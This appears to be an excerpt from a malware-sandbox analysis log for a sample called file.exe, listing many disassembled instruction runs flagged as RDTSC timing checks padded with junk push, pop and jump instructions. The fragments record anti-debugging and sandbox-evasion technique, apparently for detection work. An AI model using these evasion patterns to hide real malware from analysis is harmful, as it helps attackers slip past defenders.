              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8615D7 second address: 8615DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86170A second address: 861713 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861B7D second address: 861B87 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3D507EA966h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861CC2 second address: 861CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D50D0EC6Eh 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861CDE second address: 861CED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jp 00007F3D507EA966h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861FE8 second address: 861FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86211F second address: 862127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862127 second address: 86214F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 jmp 00007F3D50D0EC79h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86214F second address: 862173 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3D507EA966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3D507EA976h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8622C4 second address: 8622CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 865DAC second address: 865DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D507EA970h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4662 second address: 7E4668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86CA3A second address: 86CA43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F880 second address: 86F8A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d jo 00007F3D50D0EC6Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F9EC second address: 86FA01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D507EA96Ah 0x00000009 jnp 00007F3D507EA966h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FB6E second address: 86FB7C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3D50D0EC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FB7C second address: 86FB94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D507EA974h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874308 second address: 87430D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87430D second address: 87431B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3D507EA966h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874738 second address: 87474B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jbe 00007F3D50D0EC6Ch 0x0000000d jbe 00007F3D50D0EC66h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87474B second address: 874752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8749AC second address: 8749B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8782E5 second address: 8782EF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3D507EA972h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8782EF second address: 8782F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E8CC second address: 87E8F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA970h 0x00000007 jmp 00007F3D507EA977h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D1F7 second address: 87D219 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F3D50D0EC6Eh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D3F4 second address: 87D3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D666 second address: 87D682 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC76h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D943 second address: 87D947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D947 second address: 87D951 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3D50D0EC6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827793 second address: 827797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827797 second address: 8277A1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3D50D0EC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DA7E second address: 87DA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DA87 second address: 87DA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DA8B second address: 87DA8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E5C6 second address: 87E5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F3D50D0EC6Fh 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E5DD second address: 87E5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnp 00007F3D507EA972h 0x0000000b jnp 00007F3D507EA966h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 886355 second address: 88635A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8849E0 second address: 8849EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F3D507EA966h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8849EC second address: 8849F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8849F0 second address: 8849F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88558D second address: 885593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885593 second address: 885599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885599 second address: 88559D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888756 second address: 88875A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 891CD9 second address: 891CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 891E1A second address: 891E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 891E20 second address: 891E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jno 00007F3D50D0EC66h 0x0000000e jo 00007F3D50D0EC66h 0x00000014 popad 0x00000015 popad 0x00000016 push edi 0x00000017 push ebx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 891FBD second address: 891FC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892127 second address: 89214A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3D50D0EC6Dh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89214A second address: 89218C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA979h 0x00000007 push edx 0x00000008 jnp 00007F3D507EA966h 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 je 00007F3D507EA98Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 jl 00007F3D507EA966h 0x0000001f jmp 00007F3D507EA96Fh 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89241D second address: 892428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3D50D0EC66h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89258A second address: 89258E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89258E second address: 8925A7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3D50D0EC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b jng 00007F3D50D0EC81h 0x00000011 je 00007F3D50D0EC7Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898F3D second address: 898F44 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898F44 second address: 898F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F3D50D0EC66h 0x0000000d jno 00007F3D50D0EC66h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8993A5 second address: 8993DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA979h 0x00000007 jmp 00007F3D507EA978h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8993DE second address: 8993E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8993E4 second address: 8993E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8993E8 second address: 899426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D50D0EC74h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F3D50D0EC7Ch 0x00000011 jmp 00007F3D50D0EC76h 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007F3D50D0EC66h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899426 second address: 89945E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA974h 0x00000007 jnc 00007F3D507EA966h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push ecx 0x00000011 jmp 00007F3D507EA96Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007F3D507EA966h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89945E second address: 899462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899846 second address: 899864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F3D507EA96Dh 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F3D507EA966h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8999F9 second address: 8999FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899B9C second address: 899BC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push edi 0x0000000a jmp 00007F3D507EA977h 0x0000000f pop edi 0x00000010 jnp 00007F3D507EA972h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A2114 second address: 8A2119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A2119 second address: 8A2120 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1B14 second address: 8A1B48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3D50D0EC71h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3D50D0EC74h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1B48 second address: 8A1B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1B4C second address: 8A1B58 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jp 00007F3D50D0EC66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1CA7 second address: 8A1CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D507EA96Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1CB5 second address: 8A1CB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1E32 second address: 8A1E3C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3D507EA966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ADDE9 second address: 8ADDED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ADDED second address: 8ADE18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F3D507EA968h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F3D507EA97Ah 0x00000015 jmp 00007F3D507EA974h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ADE18 second address: 8ADE30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D50D0EC73h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ADE30 second address: 8ADE36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ADF96 second address: 8ADFC5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3D50D0EC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F3D50D0EC6Fh 0x0000000f pushad 0x00000010 jns 00007F3D50D0EC66h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jng 00007F3D50D0EC66h 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ADFC5 second address: 8ADFD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D507EA96Eh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ADFD8 second address: 8ADFE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F3D50D0EC66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AFB5E second address: 8AFB8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D507EA96Ah 0x00000008 jmp 00007F3D507EA973h 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007F3D507EA966h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AFB8B second address: 8AFB9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d ja 00007F3D50D0EC66h 0x00000013 pop edi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AFB9F second address: 8AFBB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA96Ch 0x00000007 jnc 00007F3D507EA96Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1F4B second address: 7D1F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4FC8 second address: 8B4FCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4FCC second address: 8B4FD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4FD6 second address: 8B4FDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4FDA second address: 8B4FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4FE2 second address: 8B4FEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F3D507EA966h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6AC5 second address: 8B6AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B85C1 second address: 8B85CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3D507EA966h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B85CB second address: 8B85DD instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3D50D0EC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F3D50D0EC66h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C1CAD second address: 8C1CB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C1B3C second address: 8C1B62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3D50D0EC76h 0x0000000c push edi 0x0000000d pop edi 0x0000000e jng 00007F3D50D0EC66h 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CB0DF second address: 8CB10F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA96Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jng 00007F3D507EA966h 0x00000012 jmp 00007F3D507EA975h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CD0C6 second address: 8CD0CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D02BD second address: 8D02D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F3D507EA96Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6193 second address: 7E61B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Ch 0x00000007 jmp 00007F3D50D0EC6Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D5F58 second address: 8D5F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
